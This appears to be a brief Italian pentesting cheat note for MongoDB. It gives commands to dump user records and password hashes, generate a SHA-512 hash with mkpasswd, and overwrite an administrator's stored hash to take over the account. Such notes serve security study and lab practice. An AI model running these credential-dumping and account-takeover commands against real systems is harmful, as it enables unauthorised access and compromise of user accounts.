tags: MongoDB Enumerazione_MongoDB
Enumerazione Utenti e Cambio password
Per prima cosa possiamo lanciare il seguente comando per enumerare gli utenti e gli hash delle loro password:
db.admin.find().forEach(printjson);Una volta enumerati possiamo cambiare la password degli utenti (in questo caso administrator) nel seguente modo:
Per prima cosa ci creiamo l’hash sha512 di una password a nostra scelta nel seguente modo:
mkpasswd -m sha-512 MioSegreto!
$6$Sgd07oClipKK.VLi$CsafTMlvEbPCL60rrAtjpkL663NDBT3NJPXdFHbs9PPfIRzc4PYjwzfiLtaAZFG9GFwH3/kPjjEdMY8ft.LMb.
Ora che abbiamo l’hash lo inseriamo in questa stringa:
db.admin.update({ "name": "administrator" },{ $set: { "x_shadow": "$6$Sgd07oClipKK.VLi$CsafTMlvEbPCL60rrAtjpkL663NDBT3NJPXdFHbs9PPfIRzc4PYjwzfiLtaAZFG9GFwH3/kPjjEdMY8ft.LMb."}}) Ora la password dell’utente administrator è MioSegreto! con la quale ci possiamo loggare sul sito che utilizza MongoDB.